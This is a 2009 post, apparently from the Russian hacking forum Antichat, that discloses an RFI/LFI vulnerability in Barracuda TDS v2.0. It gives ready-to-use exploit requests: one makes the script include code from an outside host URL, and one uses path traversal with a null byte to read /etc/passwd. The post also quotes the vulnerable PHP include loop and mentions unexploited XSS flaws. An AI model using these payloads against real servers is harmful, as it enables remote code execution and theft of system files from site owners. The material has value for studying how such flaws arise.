18.03.2009, 22:42
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами:
10058786
Репутация:
4589
|
|
Barracuda TDS v2.0 RFI \ LFI
Barracuda TDS
Версия: 2.0
Скачать: http://skripters.com/engine/download.php?id=555
Зависимость: register_globals = on
RFI \ LFI (укомплектовано раскрытием путей))
Запрос:
include_components.php?g_allowed_array[components][]=a&gParams[root_dir]=http://google.com/?
include_components.php?g_allowed_array[components][]=a&gParams[root_dir]=../../../../../../../../../../../../etc/passwd%00
Уязвимый кусок кода:
PHP код:
$g_all_objects = array();
reset($g_all_objects);
foreach($g_allowed_array['components'] as $key)
{
require_once($gParams['root_dir'].'components/'.$key.'.php');
$key = substr( $key, 0, strlen( $key )-1 );
$a = 'g'.$key;
$b = 'c'.$key;
$$a = new $b($gComponent);
$g_all_objects[] = $a;
}
Еще присутствует мешок XSS'ок, только накой они нужны, если есть RFI? 
|
|
|